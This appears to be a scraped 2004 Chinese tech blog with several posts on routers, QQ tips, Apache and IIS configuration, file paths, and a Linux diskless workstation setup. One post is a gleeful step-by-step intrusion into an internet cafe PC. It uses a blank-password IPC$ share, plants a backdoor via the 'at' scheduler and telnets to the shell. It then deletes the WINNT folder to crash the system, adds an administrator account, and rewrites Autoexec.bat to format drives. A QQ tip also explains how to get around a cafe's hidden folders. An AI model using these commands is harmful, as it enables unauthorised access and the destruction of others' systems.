成功后也不要太得意忘形,因为大多数网站 -
路由器(Router)是工作在OSI第三层(网络层)上、具有连接不同类型网络的能力并能够选择数据传送路径的网络设备。路由器有三个特征:工作在网络层上、能够连接不同类型的网络、能够选择数据传的路径。 1、路由器工作在第三层上,路由器是第三层网络设备,这样说大家可能都不理解,就先说一下集线器和交换机吧。 集线器工作在第一层(即物理层),它没有智能处理能力,对它来说,数据只是电流而已,当一个端口的电流传到集线器中时,它只是简单地将电流传送到其他端口,至于其他端口连接的计算机接收不接收这些数据,它就不管了。 交换机工作在第二层(即数据链路层),它要比集线器智能一些,对它来说,网络上的数据就是MAC地址的集合,它能分辨出帧中的源MAC地址和目的MAC地址,因此可以在任意两个端口间建立联系,但是交换机并不懂得IP地址,它只知道MAC地址。 路由器工作在第三层(即网络层),它比交换机还要“聪明”一些,它能理解数据中的IP地址,如果它接收到一个数据包,就检查其中的IP地址,如果目标地址是本地网络的就不理会,如果是其他网络的,就将数据包转发出本地网络。 2、路由器能连接不同类型的网络 我们常见的集线器和交换机一般都是用于连接以太网的,但是如果将两种网络类型连接起来,比如以太网与ATM网,集线器和交换机就派不上用场了。 路由器能够连接不同类型的局域网和广域网,如以太网、ATM网、FDDI网、令牌环网等。不同类型的网络,其传送的数据单元——帧(Frame)的格式和大小是不同的,就像公路运输是汽车为单位装载货物,而铁路运输是以车皮为单位装载货物一样,从汽车运输改为铁路运输,必须把货物从汽车上放到火车车皮上,网络中的数据也是如此,数据从一种类型的网络传输至另一种类型的网络,必须进行帧格式转换。路由器就有这种能力,而交换机和集线器就没有。 实际上,我们所说的“互联网”,就是由各种路由器连接起来的,因为互联网上存在各种不同类型的网络,集线器和交换机根本不能胜任这个任务,所以必须由路由器来担当这个角色。 3、路由器具有路径选择能力 在互联网中,从一个节点到另一个节点,可能有许多路径,路由器可以选择通畅快捷的近路,会大大提高通信速度,减轻网络系统通信负荷,节约网络系统资源,这是集线器和二层交换机所根本不具备的性能。
路由器的种类
1、接入路由器 接入路由器是指将局域网用户接入到广域网中的路由器设备,我们局域网用户接触最多的就是接入路由器了。只要有互联网的地方,就会有路由器。如果你通过局域网共享线路上网,就一定会使用路由器。 有的读者会心生疑问:我是通过代理服务器上网的,不用路由器不也能接入互联网吗?其实代理服务器也是一种路由器,一台计算机加上网卡,再加上ISDN(或Modem或ADSL),再安装上代理服务器软件,事实上就已经构成了路由器,只不过代理服务器是用软件实现路由功能,而路由器是用硬件实现路由功能,就像VCD软解压软件和VCD机的关系一样,结构不同,但是功能却是相同的。 2、企业级路由器 企业级的路由器是用于连接大型企业内成千上万的计算机,普通的局域网用户就接触不到了。与接入路由器相比,企业级路由器支持的网络协议多、速度快,要处理各种局域网类型,支持多种协议,包括IP、IPX和Vine,还要支持防火墙、包过滤以及大量的管理和安全策略以及VLAN(虚拟局域网)。 3、骨干级路由器 只有工作在电信等少数部门的技术人员,才能接触到骨干级路由器。互联网目前由几十个骨干网构成,每个骨干网服务几千个小网络,骨干级路由器实现企业级网络的互联。对它的要求是速度和可靠性,而价格则处于次要地位。硬件可靠性可以采用电话交换网中使用的技术,如热备份、双电源、双数据通路等来获得。这些技术对所有骨干路由器来说是必须的。 骨干网上的路由器终端系统通常是不能直接访问的,它们连接长距离骨干网上的ISP和企业网络。互联网的快速发展给骨干网、企业网和接入网都带来了小的挑战。
-
2004-02-21
QQ十大使用秘笈大公开 - [网络天地]
QQ是大家使用最为广泛的一个聊天工具,我想有很多人连做梦都想成为QQ高手吧?也许有人会认为“QQ高手不就是那种对QQ基本功能操作很熟练的人吗?”大错特错!对“高手”的标准实在太低了吧,相信就算是“菜鸟”也能几天就搞定的。但是,要是你掌握一些非常特殊的绝技,呵呵,那你一定可以在朋友面前炫一把,让大家对你刮目相看了,地位自然也是一日千里地上升为真正的QQ高手。废话不多说了,下面让我赶紧告诉你这10条最酷的秘技吧!
灵验的登录方法
相信大家或多或少都有过这样的体验,登录QQ时,小企鹅在屏幕上徒劳地闪动半天之后,弹出来的却是服务器太忙无法登录或者超时的提示框,接连试几次都是这样的,真的有点烦人。别着急,用下面的方法一定能让你顺利登录上去的。
先说第一种方法。如果你使用的是默认登录面板登录的话,那么你可以改用“注册向导”试试,一般情况下都能成功。还不管用的话,就得使用更绝的第二种方法了——打开多个QQ窗口来同时登录同一个号码。我遇到上述情况就会同时打开三个窗口,这里面肯定会有一个能登录上去的,百试不爽。不过也有一种情况是例外的,那就是:网络断线的时候:)。
快速定位好友
现在在一个QQ里加有好几百号人是不足为奇的事,但是Q友多了也会给自己添麻烦的哟!想想看,要在这么一大堆人里找到某某MM可不是件容易的事。怎么办?跟我做吧!首先激活QQ面板,切换到某某MM所在的组,然后在键盘上按下好友昵称的首字母(如“Vc水手”取首字母“V”,而“维C水手”取拼音“wei”的首字母“W”就定位到了一组以此字母为昵称首字母的好友了,现在找起人来方便了许多吧!
回到好友列表顶端
当你在QQ某个组中按了向下按钮又想回到列表顶端时,你没有必要再去按那个向上按钮了。有一个化繁为简的方法是:试着与其他任何一个组之间切换一下,再回到原先的组看一看,呵呵,奇迹出现了,你又回到顶端了。
打造个性的资料
你有没有发现有些人QQ资料填得很特别很有个性呢?比如“国家/地区”填的根本不是下拉列表中的内容,甚至可以换成一个贴图,你会觉得不可思议吧?其实你也完全可以拥有这么个性的资料的。实现方法很简单,在填写资料时你可以不理会那些下拉列表,直接填入你想填的内容即可(贴图可以到专门的网站去Copy)。但请注意并不是所有下拉列表都是形同虚设的,有些内容必须择其一才能填入。
让头像靠前排
想更多地吸引MM对你的注意吗?那你在她的列表中的位置可一定要排得靠前一些哟!要不然人家可能会看不到你或者对你视而不见……用不着生气,想个法子让自己排得靠前些不就行了吗!好,为了帮你实现“企图”,这一招我教定你了。Follow me,打开“个人设定”窗口,然后在自己的昵称前点一下鼠标,再按空格键插入一两个空格(不能太多了,要不然昵称就不能完整显示了),然后点击“修改”按钮进行修改。这样,以后当对方更新了你的资料或者重新登录时,你的头像就可以排在其列表数一数二的显赫位置了(在线的情况下),现在对方要想不看见你都不可能啦。
同理,想把谁放到你的好友列表顶端,就给他“改名”,在他名字前加一两个空格就行。
把自己加为好友
这一招可是厉害得很,可以让自己的头像出现在本身的列表上,这不仅显得很酷,而且有很实用得功能哦(比如下面一条秘技中就可以用到)!其实最早期的QQ版本中是可以直接把自己加为好友的,但现在的版本都行不通了。但是只要我们肯动手,没有什么能难倒我们的。步骤如下:
首先建议设定到“允许任何人把我列为好友”,然后切换到“黑名单”组,在里面空白处点击右键并选“添加坏人名单”,输入自己的QQ号码(什么?把我自己当成坏人了呀!),接下来再把这个“坏人”拖到“我的好友”组中去,这时会弹出“不能添加自己”的提示,不理会它,直接退出QQ。
再一次用注册向导登录时(注意这里一定要用注册向导!),就可以看见自己的头像已经在列表中了,而且,还可以和“自己”说话呢!
查看隐藏的文件夹
有时我们在网吧上网需要查看某些文件夹,无奈管理软件却把它们给隐藏起来了,怎么也打不开。有了QQ就好办了,你可以利用它来另类地打开这些文件夹。方法是:在机器中打开两个QQ号码甲和乙(如果没有两个号码,可以用注册向导,在自己号码前加一个“0”登录,登录后显示号码为“0xxxxxxx”),用左键在甲中点击乙的头像并选择“传送文件”,接着随便在电脑中找个小一些的文件进行传送,由乙来接收,很快就会接收完毕,弹出了一个很关键的窗口,提示“文件接收完毕,是否转到文件所在目录?”,这时请一定点击“是”按钮。
嘿嘿,现在可以随心所欲地查看该文件夹了吧!
与不喜欢的人“永别”
俗话说“林子大了,什么鸟都有”,在用QQ聊天时我们也会有碰到“坏鸟”的。你把对方删除掉也不见得能得到清净,他(她)还是可以在陌生人里喋喋不休地骚扰你。隐患就在于你的头像还保留在对方的列表里。所以我要提醒你,以后遇到这样的情况一定不能手软,就 -
2004-02-21
Apache服务器配置全攻略(二) - [网络天地]
MinSpareServers 5MaxSpareServers 10
在使用子进程处理HTTP请求的Web服务器上,由于要首先生成子进程才能处理客户的请求,因此反应时间就有一点延迟。但是,Apache服务器使用了一个特殊技术来摆脱这个问题,这就是预先生成多个空余的子进程驻留在系统中,一旦有请求出现,就立即使用这些空余的子进程进行处理,这样就不存在生成子进程造成的延迟了。在运行中随着客户请求的增多,启动的子进程会随之增多,但这些服务器副本在处理完一次HTTP请求之后并不立即退出,而是停留在计算机中等待下次请求。但是空余的子进程副本不能光增加不减少,太多的空余子进程没有处理任务,也占用服务器的处理能力,因此也要限制空余副本的数量,使其保持一个合适的数量,使得既能及时回应客户请求,又能减少不必要的进程数量。
因此就可以使用参数MinSpareServers来设置最少的空余子进程数量, 以及使用参数MaxSpareServers 来限制最多的空闲子进程数量,多余的服务器进程副本就会退出。根据服务器的实际情况来进行设置,如果服务器性能较高,并且也被频繁访问,就应该增大这两个参数的设置。对于高负载的专业网站,这两个值应该大致相同,并且等同于系统支持的最多服务器副本数量,也减少不必要的副本退出。
StartServers 5
StartServers参数就是用来设置httpd启动时启动的子进程副本数量,这个参数与上面定义的MinSpareServers和MaxSpareServers参数相关,都是用于启动空闲子进程以提高服务器的反应速度的。这个参数应该设置为前两个值之间的一个数值,小于MinSpareServers和大于MaxS pareServers都没有意义。
MaxClients 150
在另一方面,服务器的能力毕竟是有限的,不可能同时处理无限多的连接请求,因此参数Maxclient s就用于规定服务器支持的最多并发访问的客户数,如果这个值设置得过大,系统在繁忙时不得不在过多的进程之间进行切换来为太多的客户进行服务,这样对每个客户的反应就会减慢,并降低了整体的效率。如果这个值设置的较小,那么系统繁忙时就会拒绝一些客户的连接请求。当服务器性能较高时,就可以适当增加这个值的设置。对于专业网站,应该使用提高服务器效率的策略,因此这个参数不能超过硬件本身的限制,如果频繁出现拒绝访问现象,就说明需要升级服务器硬件了。对于非专业网站,不太在意对客户浏览器的反应速度,或者认为反应速度较慢也比拒绝连接好,就也可以略微超过硬件条件来设置这个参数。
这个参数限制了MinSpareServers和MaxSpareServers的设置,它们不应该大于这个参数的设置。
MaxRequestsPerChild 30
使用子进程的方式提供服务的Web服务,常用的方式是一个子进程为一次连接服务,这样造成的问题就是每次连接都需要生成、退出子进程的系统操作,使得这些额外的处理过程占据了计算机的大量处理能力。因此最好的方式是一个子进程可以为多次连接请求服务,这样就不需要这些生成、退出进程的系统消耗,Apache就采用了这样的方式,一次连接结束后,子进程并不退出,而是停留在系统中等待下一次服务请求,这样就极大的提高了性能。
但由于在处理过程中子进程要不断的申请和释放内存,次数多了就会造成一些内存垃圾,就会影响系统的稳定性,并且影响系统资源的有效利用。因此在一个副本处理过一定次数的请求之后,就可以让这个子进程副本退出,再从原始的httpd进程中重新复制一个干净的副本,这样就能提高系统的稳定性。这样,每个子进程处理服务请求次数由MaxRe questPerChild定义。 缺省的设置值为30,这个值对于具备高稳定性特点的Linux系统来讲是过于保守的设置,可以设置为1000甚至更高,设置为0支持每个副本进行无限次的服务处理。
#Listen 3000
#Listen 12.34.56.78:80
#BindAddress *
Listen参数可以指定服务器除了监视标准的80端口之外,还监视其他端口的HTTP请求。由于FreeBSD系统可以同时拥有多个IP地址,因此也可以指定服务器只听取对某个BindAddress< /B>的IP地址的HTTP请求。如果没有配置这一项,则服务器会回应对所有IP的请求。
即使使用了BindAddress参数,使得服务器只回应对一个IP地址的请求,但是通过使用扩展的Listen参数,仍然可以让HTTP守护进程回应对其他IP地址的请求。此时Listen参数的用法与上面的第二个例子相同。这种比较复杂的用法主要用于设置虚拟主机。此后可以用VirtualHost参数定义对不同IP的虚拟主机,然而这种用法是较早的HTTP 1.0标准中设置虚拟主机的方法,每针对一个虚拟主机就需要一个IP地址,实际上用处并不大。在HTTP 1.1中,增加了对单IP地址多域名的虚拟主机的支持,使得虚拟主机的设置具备更大的意义。
LoadModule mime_magic_module libexec/apache/mod_mime_magic.so
LoadModule info_module libexec/apache/mod_info.so
LoadModule speling_module libexec/apache/mod_speling.so
LoadModule proxy_module libexec/apache/libproxy.so
LoadModule rewrite_module libexec/apache/mod_rewr -
2004-02-21
Apache服务器配置全攻略(一) - [网络天地]
Apache服务器的设置文件位于/usr/local/apache/conf/目录下,传统上使用三个配置文件httpd.conf,access.conf和srm.conf,来配置Apache服务器的行为。
httpd.conf提供了最基本的服务器配置,是对守护程序httpd如何运行的技术描述;srm.conf是服务器的资源映射文件,告诉服务器各种文件的MIME类型,以及如何支持这些文件;access.conf用于配置服务器的访问权限,控制不同用户和计算机的访问限制;这三个配置文件控制着服务器的各个方面的特性,因此为了正常运行服务器便需要设置好这三个文件。
除了这三个设置文件之外,Apache还使用mime.types文件用于标识不同文件对应的MIME类型, magic文件设置不同MIME类型文件的一些特殊标识,使得Apache 服务器从文档后缀不能判断出文件的MIME 类型时,能通过文件内容中的这些特殊标记来判断文档的MIME类型。
bash-2.02$ ls -l /usr/local/apache/conf
total 100
-rw-r--r-- 1 root wheel 348 Apr 16 16:01 access.conf
-rw-r--r-- 1 root wheel 348 Feb 13 13:33 access.conf.default
-rw-r--r-- 1 root wheel 30331 May 26 08:55 httpd.conf
-rw-r--r-- 1 root wheel 29953 Feb 13 13:33 httpd.conf.default
-rw-r--r-- 1 root wheel 12441 Apr 19 15:42 magic
-rw-r--r-- 1 root wheel 12441 Feb 13 13:33 magic.default
-rw-r--r-- 1 root wheel 7334 Feb 13 13:33 mime.types
-rw-r--r-- 1 root wheel 383 May 13 17:01 srm.conf
-rw-r--r-- 1 root wheel 357 Feb 13 13:33 srm.conf.default
事实上当前版本的Apache将原来httpd.conf、srm.conf与access.conf中的所有配置参数均放在了一个配置文件httpd.conf中,只是为了与以前的版本兼容的原因(使用这三个设置文件的方式来源于NCSA-httpd),才使用三个配置文件。而提供的access.conf和srm.conf文件中没有具体的设置。
由于在新版本的Apache中,所有的设置都被放在了httpd.conf中,因此只需要调整这个文件中的设置。以下使用缺省提供的httpd.conf为例,解释Apache服务器的各个设置选项。然而不必因为它提供设置的参数太多而烦恼,基本上这些参数都很明确,也可以不加改动运行Apache服务器。但如果需要调整Apache服务器的性能,以及增加对某种特性的支持,就需要了解这些设置参数的含义。
关于Apache服务器的性能,在Internet上存在很大的争议,基本上使用Apache的使用者几乎都不怀疑它的优秀性能,Apache也支撑了很多著名的高负载的网站,但是在商业机构的评测中,Apache往往得分不高。很多人指出,在这些评测中,商业Web服务器及其操作系统往往由其专业公司的工程师进行过性能调整,而Free 的操作系统和Web服务器往往就使用其缺省配置或仅仅作很小的更改。需要指出的是,除了操作系统的性能调整之外,Apache 服务器本身的缺省配置绝不是最优化和最高效的,而是要适应几乎所有种类操作系统、所有种类硬件下的设置,多平台的软件不可能为特定平台和特定硬件提供最优化的缺省配置。因此要使用Apache的时候,性能调整是必不可少的。
在商业评测中忽略了的另一个事实是,评测时往往对不同种类的功能进行比较,例如使用Apache的标准CGI 的性能与ISAPI,NSAPI等服务器端API比较,事实上Apache服务器与此可以比较的功能为modperl ,FastCGI,与ASP类似的功能为PHP等等,只不过由于Apache的开放模式,这些功能是由独立的开发组,作为独立的模块来实现的。但是在评测中,测试人员没有加入相应的模块评测其性能。
HTTP守护进程的运行参数
httpd.conf中首先定义了一些httpd守护进程运行时需要的参数,来决定其运行方式和运行环境。
ServerType standalone
ServerType定义服务器的启动方式,缺省值为独立方式standalone,httpd
服务器将由其本身启动,并驻留在主机中监视连接请求。在Linux下将在启动文件 /etc/rc.d/rc.local/init.d/apache中自动启动Web服务器,这种方式是推荐设置。
启动Apache服务器的另一种方式是inet方式,使用超级服务器inetd监视连接请求并启动服务器。当需要使用inetd启动方式时,便需要更改为这个设置,并屏蔽/etc/rc.d/rc.local/init.d/apache文件,以及更改/etc/inetd.conf并重起inetd,那么Apache就能从inetd中启动了。
两种方式的区别是独立方式是由服务器自身管理自己的启动进程,这样在启动时能立即启动服务器的多个副本,每个副本都驻留在内存中,一有连接请求不需要生成子进程就可以立即进行处理,对于客户浏览器的请求反应更快,性能较高。而 inetd方式要由inetd发现有连接请求后才去启动http服务器,由于inetd 要监听太多的端口,因此反应较慢、效率较低,但节约了没有连接请求时Web服务器占用的资源。因此inetd方式只用于偶尔被访问并且不要求访问速度的服务器上。事实上inetd方式不适合http的突发和多连接的特性,因为一个页面可能包含多个图象,而每个图象都会引起一个连接请求,即使虽然访问人数造成教少,但瞬间的连接请求并不少,这就 -
2004-02-21
关于绝对路径、相对路径和URL - [网络天地]
引言:由于很多使用者在使用我的或其他程序员的CGI、PHP是把绝对路径、相对路径和URL的概念混淆,导致遇到许多不必要的麻烦,所以我决定写此文为需要的朋友解惑。
通常我们在安装使用PHP和CGI时通常都会遇到“绝对路径”和“相对路径”这两个概念,要熟练的操作计算机的目录户对于“绝对路径”和“相对路径”就应该很熟悉才对。我想可能由于近几年学习计算机的人都是使用在windows系统,在管理文件时都是对“文件夹”(其实“文件夹”很多时候就是一个目录)进行操作,很少深入了解文件的目录的概念以至遇到在WEB服务器上安装程序时往往搞错。对于DOS和UNIX的用户来说,目录应该是一个很熟悉的概念才对。
所谓“绝对路径”就是从根目录开始一直到该目录的全程的路径,这样说可能太抽象,举个例子:"c:\apache\htdocs\cgi-bin\test.cgi"就是文件test.cgi的绝对路径。在UNIX下的一个例子是:
"/usr/local/apache/htdocs/cgi-bin/test.cgi"
所谓“相对路径”就是相对于当前目录的路径,举个例子:例如当前目录目录是 "c:\apache\htdocs\" 你要浏览 c:\apache\htdocs\cgi-bin\test.cgi文件的内容,那么只需在命令行里输入 "type cgi-bin\test.cgi" 就可以了,要是在"c:\apache\htdocs\cgi-bin\xyz\"下呢,那么就是 "type ..\test.cgi"。UNIX下“相对路径”的概念也一样,因为windows的目录的概念就是从UNIX来的。
URL是英文资源定位的缩写,例如 http://zjxyz.uhome.net/ 就是一个URL 但是URL的应用范围不止我们最常用的WEB服务器,它还可以定位其他的网上的资源,如FTP等。不过我们下面还是以 WEB 服务为例。
通常WEB服务器都会以计算机上某个目录作为该网站的根目录,例如一个安装在UNIX系统/usr/local/apache/目录下的apache服务器,网站默认根目录是 /usr/local/apache/htdocs/ ,我们可以用URL http://www.hostname.net/ 来访问该目录的下的文件,如果我们在 "htdocs" 下建立一个xyz的子目录,那么我们可以用 http://www.hostname.net/xyz/ 来访问目录 xyz 下的文件。有时我们会发现 /usr/local/apache/cgi-bin/ 是这样访问的 http://www.hostname.net/cgi-bin/ 明明 cgi-bin 不在 htdocs 目录下,为何又能这样样访问呢?这是由于apache服务器的配置文件里有一句里有 ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/" 把路径重新定向了。
-
一.这次讲的是IIS的一些设置,由于小弟中用过win2k的服务器版,其它的我就不会了,同时我管理服务器也只有两个月的时候,在此之前,从来没有接触过iis之类的,连在本机调试也没有。这次由于很多的朋友问iis的设置问题,我就将这两个月来我所积累的经验写出来,希望大家不要见笑。有不足的地方能够指出一 下。好了,费话不多了,下面我们就开始吧!
二.首先我们先来建立web站点吧,管理工具--Internet 服务管理器--新建一个web站点就可以了,或者就用默认的web站点。好了,建好了一个站点,我们接下来就要为这个站点捆邦一个域名了,通常大家都是会自己的国际顶级域名解析到自己的服务器上,你只要在域名服务商那里将域名解析到这台服务器的ip上就可以了,我们打开己建好的web站点的属性,嘿嘿,那个主机头就填你的顶级域名就OK了,你有几个就填几个。很简单的啊。接下来配置合适的脚本映射。在主目录的执行许可的配置里面。
首先我们来删除一些没有什么用的并可能导致服务器被攻击的脚本映射!
1 *.htr这是一个比较厉害的文件,删掉好了。否则,任何人都可以通过你的web来进行非法操作,甚至格式化掉你的硬盘。
2 *.hta 删掉吧。
3 *.idc 所以删掉他。
4 *.printer这个是打印机文件。去掉他好了
5 *.htw , *.ida *.idq这些都是索引文件,可以去掉了。
可执行的文件你可以自由配置啦啊,如果不让支持asp就将asp的脚本映射删除就行了,想让支持cgi,php(己安装了解释器),就配置这些文件的执行程序就可以了。。比如要执行php,你的php安装在c:\php,那你就在主目录的配置里的应用程序配置,添加可执行文件c:\php\php.exe,扩展名为.php就可以了,那么这个站点就可以运行php了,如果你想让他运行php3,重复上面的工作,只是将扩展名改成.php3就行了。呵。cgi也一样啊添加cgi可执行文件,扩展名用.cgi就行了。
下面我们要做的就是将默认的站点(您可以选择停止,不让运行)的默认的一些虚拟目录删除,像iisadmin这些,要不然可能就死得很惨哟!!呵呵很简单啊。。同样你建立一个虚拟目录也很简单啊,点击web站点的右键,新建一个虚拟目录,比如要建一个虚幻神化的江湖,就新建一个jxqy的虚拟目录名,接着就指向你程序所在的位置就可以使用www.*****.com/jxqy来访问你的虚幻神化了。
还有,如果你建的这个web站点是送朋友的或者卖给客户的,你想做他的网站作一些限制??(别太心狠啊,作太多的限制哟),打开web站点的属于,有一个链接,看到没?一个是无限,一个是限制的,我们选择下面的限制,要限制多少人呢?得了,150人吧,那就填150链接,链接超时?一般150就够啦啊!!下面我们来对网站的性能作一些限制吧。那就在web站点的属性这里的性能这里设置吧,呵呵。你希望这个网站每天的点击量多少啊??想多少??自己选择了,下面选择启动宽带限制啊。。一般20kb/s就可以了。。。最大cpu占用资源??2%就可以了。呵呵,我还要为服务器上的服务站着想呢:)
在web站点的属性看到那个文档没?那个就是设置站点的默认首页的,你的站想使用什么文件作首页就在这里调吧。呵呵。还有web站点属性里面的那个目录安全性,用到的地方可大着呢,呵呵。首先,在这里设置大家匿名访问你的网站。。。管理工具--Internet 服务管理器--打开你所需设置的web站点的属性--目录安全性--匿名访问和验证控制--编辑--匿名访问打上勾--编辑--选择你的用来作匿名访问的帐号--确定--好了可以访了!!呵呵,想不让某些爱搞蛋的家伙不能来访问你的网站???那就将他们的IP限制住就行喽,也就在目录安全性这里。不要说你这也不会啊。。
三:我们来讲讲ftp的设置吧。。这个就很简单啦啊,在Internet信息服务里点右键,新建ftp站点,按下一步,填写这个ftp站点的说明。填写ip地址,就写你的服务器的IP吧,端口??随便你想一个啊,最好人家不好猜到的,这样的话就算是知道用户名和密码,一时也不好上FTP哟,呵呵。再下一步就是这个FTP链上的时候,指向你服务器上的哪一个目录啊,这个你自己设吧,你建立的哪个目录是用来放网站的就指向哪个目录,好了,一个FTP建成了。。接下来你就因该去管理工具里面的计算机管理,新建一个用户了,是用作链接刚才新建的这个FTP的帐号。帐号建好了,那就去要开刚才新建的FTP的属性,同样有链接的选项,呵呵,同时使用这个FTP的人?三四个就可以了。下面我们看看安全帐号这里,将匿名进行FTP的这个勾去掉,要不然别人就匿名上这个FTP了,呵呵,我最喜欢这样上人家的服务器拷贝资料了,呵呵。再添加一个操作员,也就是你刚才新建的帐号啊。还有旁边还有一个消息的功能,就用来链接FTP,服务器的提示信息,就是在这里填的,还有目录安全性?你不想让某个IP段或某个IP不准使用这个FTP?来这里限制吧。呵。好了,一些设置基本上也只有这么一些,下面我们来讲讲给用户配置空间的大小吧。。
四:磁盘分区配额
磁盘配额的启用
大家都知道,我们有时需要限制某些客户的能够使用的磁盘容量,这点,我 -
2004-02-20
Linux无盘工作站架设实例 - [网络天地]
摘要
架设Linux无盘工作站实例,服务器和客户端都使用Linux。主要涉及:DHCP TFTP SYSLINUX NFS
客户端是支持PXE方式启动的刀片,用Linux作为服务器,服务器配置如下:
1) 安装DHCP服务器dhcpd
2) 配置/etc/dhcpd.conf文件,下面是我机器上的文件
max-lease-time -1;
default-lease-time -1; #注:IP地址永不过期
option subnet-mask 255.0.0.0;
option routers 10.0.0.1;
option domain-name-servers 10.10.10.10;
# option netbios-name-servers 10.10.10.10;
option broadcast-address 10.255.255.255;
# option dhcp-class-identifier "PXEClient";
# option vendor-encapsulated-options 01:04:00:00:00:00:ff;
# option option-135 "start";
subnet 10.0.0.0 netmask 255.0.0.0 {
range 10.10.12.131 10.10.12.150;
host blade01 {
hardware ethernet 00:e0:43:00:02:00;
fixed-address 10.10.12.131;
filename "/tftpboot/pxelinux.0"; #注:启动映象文件
}
host blade02 {
hardware ethernet 00:e0:43:00:02:02;
fixed-address 10.10.12.132;
filename "/tftpboot/pxelinux.0";
}
host blade03 {
hardware ethernet 00:e0:43:00:02:04;
fixed-address 10.10.12.133;
filename "/tftpboot/pxelinux.0";
}
host blade04 {
hardware ethernet 00:e0:43:00:02:06;
fixed-address 10.10.12.134;
filename "/tftpboot/pxelinux.0";
}
host blade05 {
hardware ethernet 00:e0:43:00:02:08;
fixed-address 10.10.12.135;
filename "/tftpboot/pxelinux.0";
}
}
说明:dhcp客户得到IP地址后用TFTP协议从服务器上下载启动映象文件。我用syslinux
工具包里边的pxelinux来作为远程启动的loder.
3) 配置tftp server
使用pxelinux作引导工具需要支持TSIZE参数的tftp server。可http://www.kernel.org/pub/software/network/tftp/下载。
通过xinetd来使用tftp服务,我的/etc/xinetd.conf文件如下
......
service tftp
{
socket_type = dgram
protocol = udp
wait = yes
user = root
server = /usr/sbin/in.tftpd
}
4) 配置PXELINUX
先安装syslinux软件包。可http://www.kernel.org/pub/linux/utils/boot/syslinux/下载。
将pxelinux.0拷贝到/tftpboot/目录下,然后建立/tftpboot/syslinux.cfg/目录。该目录下存放配置文件。
pxelinux使用ip地址的十六进制表示来作为该ip地址的配置文件的文件名。如blade01的ip地址为10.10.12.131,配置文件名为0A0A0C83,内容为:
default linux
label linux
kernel vmlinuz
append ip=dhcp root=/dev/nfsroot nfsroot=10.10.11.120:/remote/blade01 vga=normal
5) 配置nfs
为每个刀片建立一个根目录,在该刀片的pxelinux配置文件里指定了从这个nfs export的目录启动。该根目录里应把标准的目录都建好,另外需要重新mount的usr, home, public等目录也要export。
我的 /etc/exports文件:
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
/remote/blade01 blade01(rw,async,no_root_squash)
/remote/blade02 blade02(rw,async,no_root_squash)
/remote/blade03 blade03(rw,async,no_root_squash)
/remote/blade04 blade04(rw,async,no_root_squash)
/remote/blade05 blade05(rw,async,no_root_squash)
/remote/root *(rw,async,no_root_squash)
/remote/home *(rw,async,no_root_squash)
/usr *(ro,async,no_root_squash)
/sbin *(ro,async,no_root_squash)
/bin *(ro,async,no_root_squash)
/lib *(ro,async,no_root_squash)
/home *(ro,async,no_root_squash)
6)为每个刀片修改它的/etc/fstab文件,以blade01为例,它的nfs root是/remote/blade01
/remote/blade01/etc/fstab文件如下:
# /etc/fstab: static file system information.
#
#
10.10.11.120:/remote/blade01 / nfs defaults,intr 0 1
10.10.11.120:/remote/root /root nfs defaults,intr 0 1
10.10.11.120:/remote/home /home nfs defaults,intr 0 1
10.10.11.120:/bin /bin nfs defaults,intr 0 1
10.10.11.120:/usr /usr nfs defaults,intr 0 1
10.10.11.120:/sbin /sbin nfs defaults,intr 0 1
10.10.11.120:/lib /lib nfs defaults,intr 0 1
none /proc proc defaults,intr 0 1
同时还要为每个刀片修改它的网络配置文件,配置ip地址,启动两块网卡等等。。
7) 编译内核
刀片用的内核,应该支持Kernel Level Auto Configuration的DHCP协议,支持NFS,支持NFS ROOT,假设编译好的内核为vmlinuz,将它拷贝到/tftpboot/目录下。
参考文档:
http://syslinux.zytor.com/pxe.php
http://syslin -
先查它的ip IP:61.141.xxx.xxx (方法很多的)
我就打开DOS输入:net use \\61.141.xxx.xxx\ipc$
提示输入密码:
我估计是空!
直接按下[Enter]
真的被我猜中了!
接着我便继续输入:net use \\61.141.xxx.xxx\c$
提示输入密码:
我也没有理会!
谁知道这下不管用了!
找他的弱口令X-SCANNER(冰河的力作。下载地方http://www.xfocus.org)扫他
我接着就映射他的c盘
net use z: \\61.141.xxx.xxx\c$
接着把NETX99放上去!
看他的时间!
net time \\61.141.xxx.xxx
他的时间是假如是下午3:02分
接着安排他的执行时间!
at \\61.141.xxx.xxx 15:04 ncx99.exe
命令成功完成!
接下来就是等时间了!
OK!到时间了!
telnet 61.141.xxx.xxx 99
进入了!
c:\>rd /s /q WINNT
呵呵!
这时你会发现有很多文件拒绝访问!
不要害怕!
这是很正常的事情!
因为他有很多文件正在调用!
不过他的机器很快就会拼命报错!
直到系统崩溃!
呵呵!
对于一个网吧来说!
这个无疑是一个致命的打击!
没有主机怎么上网?
只有关门了!
呵呵!
接着就是如何获取ADMIN的权限了!
我们首先把他的C盘映射成为我们的Z盘!
开始--运行--cmd
输入:net use z: //61.141.xxx.xxx/c$ "密码" /user:"用户名"
出现:命令成功完成
这时候你打开“我的电脑”看看!
是不是多了一个Z盘?
接着不用我多说了吧?
首先必须创建一个你自己的用户名
输入:net user 用户名 "密码" /add
出现:命令成功完成
OK!
接着就是如何把你创建的用户加到ADMIN组了!
输入:net localgroup "administrators" 用户名 /add
出现:命令成功完成
呵呵!
我们把他的WINNT目录删除掉!
回到对方的MS-DOS下!
输入:rd /s /q WINNT
这时你会发现有很多文件拒绝访问!
不要害怕!
这是很正常的事情!
因为他有很多文件正在调用!
不过他的机器很快就会拼命报错!
直到系统崩溃!
够好玩的了吧?
如果对方是WIN98的话你可以把他C盘根目录下的Autoexec.bat文件改一下!
打开他的Autoexec.bat文件!
把原来的全删掉!
输入:
--------------------
@echo off
format d: /q /u
delete d:
format c: /q /u
delete c:
--------------------
保存!
等他重启后就会慢慢的格掉D盘再格C盘! 呵呵............不要干坏事呀!
-
2004-02-20
网络10大漏洞 -- 黑客至爱 - [网络天地]
这里介绍的10大漏洞是当今互联网上发现的最普遍而且风险最高的漏洞。这个10大漏洞清单主要来源于ISS X-Force安全小组的分析、用户的安全报告、ISS的专业服务队伍和安全合作伙伴。10大漏洞表由ISS X-Force小组维护并以ISS安全警告汇编的形式每季度发布。
鉴于这10大漏洞的重要性和严重性,建议各个行业、企业、机构的安全主管机构充分重视这些安全问题,并将这些漏洞的解决办法和处理决策落实到安全策略中,建立更加有效、更加完善的信息安全防护体系。
10大漏洞
1. 拒绝服务攻击
- TFN
- TFN2k
- Trin00
- Stacheldraht
- FunTime Apocalypse
2. 脆弱的账号
- 缺省账户(路由器、防火墙)
- 管理员账户admin/root的空口令或弱口令
